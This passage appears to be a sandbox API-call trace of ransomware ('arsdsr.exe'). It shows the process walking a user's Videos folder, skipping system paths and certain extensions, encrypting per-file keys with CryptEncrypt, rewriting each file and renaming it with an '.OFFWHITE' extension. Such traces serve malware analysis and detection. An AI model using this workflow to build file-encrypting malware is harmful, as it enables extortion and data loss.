(lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\6kqntydp8f.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.016] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=29486) returned 1 [0136.016] GetProcessHeap () returned 0x500000 [0136.016] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.016] GetProcessHeap () returned 0x500000 [0136.016] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.016] GetProcessHeap () returned 0x500000 [0136.016] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.016] GetProcessHeap () returned 0x500000 [0136.016] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.016] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.016] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.016] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.016] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.016] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.016] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.016] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.017] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.017] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.017] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.017] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.017] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.017] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x732e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.017] SetLastError (dwErrCode=0x0) [0136.017] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.019] GetLastError () returned 0x0 [0136.019] GetLastError () returned 0x0 [0136.019] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x742e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.020] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.020] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x752e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.020] WriteFile (in: hFile=0x21c, lpBuffer=0x522010*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522010*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.020] GetProcessHeap () returned 0x500000 [0136.020] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x732e) returned 0x55a7b8 [0136.020] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.020] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x732e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x732e, lpOverlapped=0x0) returned 1 [0136.023] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.023] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x732e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x732e, lpOverlapped=0x0) returned 1 [0136.023] GetProcessHeap () returned 0x500000 [0136.023] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.023] CloseHandle (hObject=0x21c) returned 1 [0136.026] GetProcessHeap () returned 0x500000 [0136.026] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.026] GetProcessHeap () returned 0x500000 [0136.026] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.026] GetProcessHeap () returned 0x500000 [0136.026] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.026] GetProcessHeap () returned 0x500000 [0136.026] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.026] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv" [0136.026] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv.OFFWHITE" [0136.026] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\6kqntydp8f.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\6kqntydp8f.mkv.offwhite")) returned 1 [0136.027] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c58b70, ftCreationTime.dwHighDateTime=0x1d5e747, ftLastAccessTime.dwLowDateTime=0xd6392bd0, ftLastAccessTime.dwHighDateTime=0x1d5df01, ftLastWriteTime.dwLowDateTime=0xd6392bd0, ftLastWriteTime.dwHighDateTime=0x1d5df01, nFileSizeHigh=0x0, nFileSizeLow=0xaa7d, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="7iQCRd5AR4Xf2Q-Uv.flv", cAlternateFileName="7IQCRD~1.FLV")) returned 1 [0136.027] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2=".") returned 1 [0136.027] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="..") returned 1 [0136.027] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="...") returned 1 [0136.027] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="windows") returned -1 [0136.027] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="$recycle.bin") returned 1 [0136.027] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="rsa") returned -1 [0136.027] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="ntuser.dat") returned -1 [0136.028] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="programdata") returned -1 [0136.028] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="appdata") returned -1 [0136.028] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="program files") returned -1 [0136.028] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="program files (x86)") returned -1 [0136.028] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.028] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="7iQCRd5AR4Xf2Q-Uv.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv" [0136.028] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.028] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.028] PathFindExtensionW (pszPath="7iQCRd5AR4Xf2Q-Uv.flv") returned=".flv" [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0136.028] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0136.029] lstrcmpiW (lpString1="7iQCRd5AR4Xf2Q-Uv.flv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.029] GetProcessHeap () returned 0x500000 [0136.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522020 [0136.029] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\7iqcrd5ar4xf2q-uv.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.029] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=43645) returned 1 [0136.029] GetProcessHeap () returned 0x500000 [0136.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.029] GetProcessHeap () returned 0x500000 [0136.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.029] GetProcessHeap () returned 0x500000 [0136.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.029] GetProcessHeap () returned 0x500000 [0136.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.029] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.029] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.029] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.029] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.030] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.030] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.030] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.030] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.030] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.030] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.030] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.030] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.030] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaa7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.030] SetLastError (dwErrCode=0x0) [0136.030] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.032] GetLastError () returned 0x0 [0136.033] GetLastError () returned 0x0 [0136.033] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xab7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.033] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.033] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xac7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.033] WriteFile (in: hFile=0x21c, lpBuffer=0x522020*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522020*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.033] GetProcessHeap () returned 0x500000 [0136.033] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xaa7d) returned 0x55a7b8 [0136.033] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.033] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xaa7d, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0xaa7d, lpOverlapped=0x0) returned 1 [0136.037] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.037] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xaa7d, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0xaa7d, lpOverlapped=0x0) returned 1 [0136.037] GetProcessHeap () returned 0x500000 [0136.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.037] CloseHandle (hObject=0x21c) returned 1 [0136.040] GetProcessHeap () returned 0x500000 [0136.041] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.041] GetProcessHeap () returned 0x500000 [0136.041] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.041] GetProcessHeap () returned 0x500000 [0136.041] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.041] GetProcessHeap () returned 0x500000 [0136.041] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.041] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv" [0136.041] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv.OFFWHITE" [0136.041] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\7iqcrd5ar4xf2q-uv.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\7iQCRd5AR4Xf2Q-Uv.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\7iqcrd5ar4xf2q-uv.flv.offwhite")) returned 1 [0136.042] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ffb5d70, ftCreationTime.dwHighDateTime=0x1d5dff4, ftLastAccessTime.dwLowDateTime=0x869023f0, ftLastAccessTime.dwHighDateTime=0x1d5df87, ftLastWriteTime.dwLowDateTime=0x869023f0, ftLastWriteTime.dwHighDateTime=0x1d5df87, nFileSizeHigh=0x0, nFileSizeLow=0xf4d8, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="BokOXLpFeKotVq.swf", cAlternateFileName="BOKOXL~1.SWF")) returned 1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2=".") returned 1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="..") returned 1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="...") returned 1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="windows") returned -1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="$recycle.bin") returned 1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="rsa") returned -1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="ntuser.dat") returned -1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="programdata") returned -1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="appdata") returned 1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="program files") returned -1 [0136.042] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="program files (x86)") returned -1 [0136.042] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.042] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="BokOXLpFeKotVq.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf" [0136.042] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.042] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.042] PathFindExtensionW (pszPath="BokOXLpFeKotVq.swf") returned=".swf" [0136.042] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0136.042] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0136.042] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0136.042] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0136.043] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0136.043] lstrcmpiW (lpString1="BokOXLpFeKotVq.swf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.043] GetProcessHeap () returned 0x500000 [0136.043] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522030 [0136.043] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\BokOXLpFeKotVq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\bokoxlpfekotvq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.043] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=62680) returned 1 [0136.043] GetProcessHeap () returned 0x500000 [0136.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.044] GetProcessHeap () returned 0x500000 [0136.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.044] GetProcessHeap () returned 0x500000 [0136.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.044] GetProcessHeap () returned 0x500000 [0136.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.044] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.044] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.044] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.044] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.044] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.044] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.044] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.044] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.044] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.044] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.044] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.045] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.045] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf4d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.045] SetLastError (dwErrCode=0x0) [0136.045] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.047] GetLastError () returned 0x0 [0136.047] GetLastError () returned 0x0 [0136.047] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf5d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.047] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.047] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf6d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.047] WriteFile (in: hFile=0x21c, lpBuffer=0x522030*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522030*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.047] GetProcessHeap () returned 0x500000 [0136.047] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xf4d8) returned 0x55a7b8 [0136.047] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.047] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xf4d8, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0xf4d8, lpOverlapped=0x0) returned 1 [0136.052] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.052] WriteFile (in: hFile=0x21c, 